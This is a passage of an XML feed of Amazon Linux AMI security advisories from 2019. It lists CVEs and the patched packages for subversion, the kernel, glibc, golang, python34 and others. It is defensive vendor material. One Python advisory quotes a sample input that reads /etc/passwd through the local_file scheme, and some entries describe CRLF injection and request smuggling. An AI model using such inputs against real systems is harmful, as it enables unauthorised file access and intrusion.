/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-0203:
In Apache Subversion versions up to and including 1.9.10, 1.10.4, 1.12.0, Subversion&#039;s svnserve server process may exit when a client sends certain sequences of protocol commands. This can lead to disruption for users of the server.
99999:
CVE-2019-0203 subversion: NULL pointer dereference in svnserve leading to an unauthenticated remote DoS
CVE-2018-11782:
In Apache Subversion versions up to and including 1.9.10, 1.10.4, 1.12.0, Subversion&#039;s svnserve server process may exit when a well-formed read-only request produces a particular answer. This can lead to disruption for users of the server.
99999:
CVE-2018-11782 subversion: remotely triggerable DoS vulnerability in svnserve &#039;get-deleted-rev&#039;
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11782" title="" id="CVE-2018-11782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0203" title="" id="CVE-2019-0203" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_dav_svn" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-python27" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python26-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.9.7" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.9.7-1.60.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="mod24_dav_svn" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-python26" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python26-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python27-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.9.7-1.60.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.9.7" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.9.7-1.60.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1318</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1318: medium priority package update for microcode_ctl kernel</title><issued date="2019-11-14 20:06:00" /><updated date="2019-11-16 03:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11139:
Improper conditions check in the voltage modulation interface for some Intel Xeon Scalable Processors may allow a privileged user to potentially enable denial of service via local access.
99999:
CVE-2019-11139 hw: voltage modulation technical advisory
CVE-2019-11135:
TSX Asynchronous Abort condition on some CPUs utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access.
99999:
CVE-2019-11135 hw: TSX Transaction Asynchronous Abort (TAA)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11135" title="" id="CVE-2019-11135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11139" title="" id="CVE-2019-11139" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="microcode_ctl-debuginfo" version="2.1" release="47.36.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-debuginfo-2.1-47.36.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.36.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-2.1-47.36.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.36.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-debuginfo-2.1-47.36.amzn1.i686.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.36.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-2.1-47.36.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.152-98.182.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1319</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1319: low priority package update for blktrace</title><issued date="2019-11-19 17:30:00" /><updated date="2019-11-22 03:22:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10689:
blktrace (aka Block IO Tracing) 1.2.0, as used with the Linux kernel and Android, has a buffer overflow in the dev_map_read function in btt/devmap.c because the device and devno arrays are too small, as demonstrated by an invalid free when using the btt program with a crafted file.
99999:
CVE-2018-10689 blktrace: buffer overflow in the dev_map_read function in btt/devmap.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10689" title="" id="CVE-2018-10689" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="blktrace-debuginfo" version="1.0.5" release="9.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/blktrace-debuginfo-1.0.5-9.16.amzn1.x86_64.rpm</filename></package><package name="blktrace" version="1.0.5" release="9.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/blktrace-1.0.5-9.16.amzn1.x86_64.rpm</filename></package><package name="blktrace" version="1.0.5" release="9.16.amzn1" epoch="0" arch="i686"><filename>Packages/blktrace-1.0.5-9.16.amzn1.i686.rpm</filename></package><package name="blktrace-debuginfo" version="1.0.5" release="9.16.amzn1" epoch="0" arch="i686"><filename>Packages/blktrace-debuginfo-1.0.5-9.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1320</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1320: medium priority package update for glibc</title><issued date="2019-11-19 17:30:00" /><updated date="2019-11-22 03:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-10739:
In the GNU C Library (aka glibc or libc6) through 2.28, the getaddrinfo function would successfully parse a string that contained an IPv4 address followed by whitespace and arbitrary characters, which could lead applications to incorrectly assume that it had parsed a valid string, without the possibility of embedded HTTP headers or other potentially dangerous substrings.
99999:
CVE-2016-10739 glibc: getaddrinfo should reject IP addresses with trailing characters
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10739" title="" id="CVE-2016-10739" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-static" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-292.178.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1321</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1321: medium priority package update for golang</title><issued date="2019-11-19 17:31:00" /><updated date="2019-11-22 03:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-16276:
It was discovered that net/http (through net/textproto) in golang does not correctly interpret HTTP requests where an HTTP header contains spaces before the colon. This could be abused by an attacker to smuggle HTTP requests when a proxy or a firewall is placed behind a server implemented in Go or to filter bypasses depending on the specific network configuration.
99999:
CVE-2019-16276 golang: HTTP/1.1 headers with a space before the colon leads to filter bypass or request smuggling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16276" title="" id="CVE-2019-16276" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang" version="1.12.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.12.8-1.52.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.12.8" release="1.52.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.12.8-1.52.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.12.8" release="1.52.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.12.8-1.52.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.12.8" release="1.52.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.12.8-1.52.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.12.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.12.8-1.52.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.12.8" release="1.52.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.12.8-1.52.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.12.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.12.8-1.52.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.12.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.12.8-1.52.amzn1.i686.rpm</filename></package><package name="golang" version="1.12.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.12.8-1.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1322</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1322: important priority package update for kernel</title><issued date="2019-11-19 17:31:00" /><updated date="2019-11-22 19:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-12207:
A flaw was found in the way Intel CPUs handle inconsistency between, virtual to physical memory address translations in CPU&#039;s local cache and system software&#039;s Paging structure entries. A privileged guest user may use this flaw to induce a hardware Machine Check Error on the host processor, resulting in a severe DoS scenario by halting the processor.\n\nSystem software like OS OR Virtual Machine Monitor (VMM) use virtual memory system for storing program instructions and data in memory. Virtual Memory system uses Paging structures like Page Tables and Page Directories to manage system memory. The processor&#039;s Memory Management Unit (MMU) uses Paging structure entries to translate program&#039;s virtual memory addresses to physical memory addresses. The processor stores these address translations into its local cache buffer called - Translation Lookaside Buffer (TLB). TLB has two parts, one for instructions and other for data addresses.\n\nSystem software can modify its Paging structure entries to change address mappings OR certain attributes like page size etc. Upon such Paging structure alterations in memory, system software must invalidate the corresponding address translations in the processor&#039;s TLB cache. But before this TLB invalidation takes place, a privileged guest user may trigger an instruction fetch operation, which could use an already cached, but now invalid, virtual to physical address translation from Instruction TLB (ITLB). Thus accessing an invalid physical memory address and resulting in halting the processor due to the Machine Check Error (MCE) on Page Size Change.
99999:
CVE-2018-12207 hw: Machine Check Error on Page Size Change (IFU)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12207" title="" id="CVE-2018-12207" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.154-99.181.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1323</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1323: medium priority package update for libapreq2</title><issued date="2019-11-19 17:31:00" /><updated date="2019-11-22 03:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-12412:
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12412" title="" id="CVE-2019-12412" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libapreq2-libs" version="2.13" release="38.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-libs-2.13-38.2.amzn1.x86_64.rpm</filename></package><package name="libapreq2" version="2.13" release="38.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-2.13-38.2.amzn1.x86_64.rpm</filename></package><package name="libapreq2-debuginfo" version="2.13" release="38.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-debuginfo-2.13-38.2.amzn1.x86_64.rpm</filename></package><package name="libapreq2-devel" version="2.13" release="38.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-devel-2.13-38.2.amzn1.x86_64.rpm</filename></package><package name="perl-libapreq2" version="2.13" release="38.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-libapreq2-2.13-38.2.amzn1.x86_64.rpm</filename></package><package name="libapreq2-libs" version="2.13" release="38.2.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-libs-2.13-38.2.amzn1.i686.rpm</filename></package><package name="libapreq2" version="2.13" release="38.2.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-2.13-38.2.amzn1.i686.rpm</filename></package><package name="libapreq2-debuginfo" version="2.13" release="38.2.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-debuginfo-2.13-38.2.amzn1.i686.rpm</filename></package><package name="libapreq2-devel" version="2.13" release="38.2.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-devel-2.13-38.2.amzn1.i686.rpm</filename></package><package name="perl-libapreq2" version="2.13" release="38.2.amzn1" epoch="0" arch="i686"><filename>Packages/perl-libapreq2-2.13-38.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1324</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1324: important priority package update for python34</title><issued date="2019-11-19 17:31:00" /><updated date="2019-11-22 03:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9948:
urllib in Python 2.x through 2.7.16 supports the local_file: scheme, which makes it easier for remote attackers to bypass protection mechanisms that blacklist file: URIs, as demonstrated by triggering a urllib.urlopen(&#039;local_file:///etc/passwd&#039;) call.
1695570:
CVE-2019-9948 python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms
CVE-2019-9947:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the path component of a URL that lacks a ? character) followed by an HTTP header or a Redis command. This is similar to the CVE-2019-9740 query string issue.
1695572:
CVE-2019-9947 python: improper neutralization of CRLF sequences in urllib module
1695572:
CVE-2019-9947 python: CRLF injection via the path part of the url passed to urlopen()
CVE-2019-9740:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the query string after a ? character) followed by an HTTP header or a Redis command.
1688169:
CVE-2019-9740 python: improper neutralization of CRLF sequences in urllib module
1688169:
CVE-2019-9740 python: CRLF injection via the query part of the url passed to urlopen()
CVE-2019-9636:
Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is affected by: Improper Handling of Unicode Encoding (with an incorrect netloc) during NFKC normalization. The impact is: Information disclosure (credentials, cookies, etc. that are cached against a given hostname). The components are: urllib.parse.urlsplit, urllib.parse.urlparse. The attack vector is: A specially crafted URL could be incorrectly parsed to locate cookies or authentication data and send that information to a different host than when parsed correctly.
1688543:
CVE-2019-9636 python: Information Disclosure due to urlsplit improper NFKC normalization
CVE-2019-16056:
An issue was discovered in Python through 2.7.16, 3.x through 3.5.7, 3.6.x through 3.6.9, and 3.7.x through 3.7.4. The email module wrongly parses email addresses that contain multiple @ characters. An application that uses the email module and implements some kind of checks on the From/To headers of a message could be tricked into accepting an email address that should be denied. An attack may be the same as in CVE-2019-11340; however, this CVE applies to Python more generally.
99999:
CVE-2019-16056 python: email.utils.parseaddr wrongly parses email addresses
CVE-2019-10160:
A security regression of CVE-2019-9636 was discovered in python, since commit d537ab0ff9767ef024f26246899728f0116b1ec3, which still allows an attacker to exploit CVE-2019-9636 by abusing the user and password parts of a URL. When an application parses user-supplied URLs to store cookies, authentication credentials, or other kind of information, it is possible for an attacker to provide specially crafted URLs to make the application locate host-related information (e.g. cookies, authentication data) and send them to a different host than where it should, unlike if the URLs had been correctly parsed. The result of an attack may vary based on the application.
1718388:
CVE-2019-10160 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10160" title="" id="CVE-2019-10160" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16056" title="" id="CVE-2019-16056" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9636" title="" id="CVE-2019-9636" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9740" title="" id="CVE-2019-9740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9947" title="" id="CVE-2019-9947" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9948" title="" id="CVE-2019-9948" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-debuginfo" version="3.4.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.49.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.49.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.49.amzn1" epoch="0" 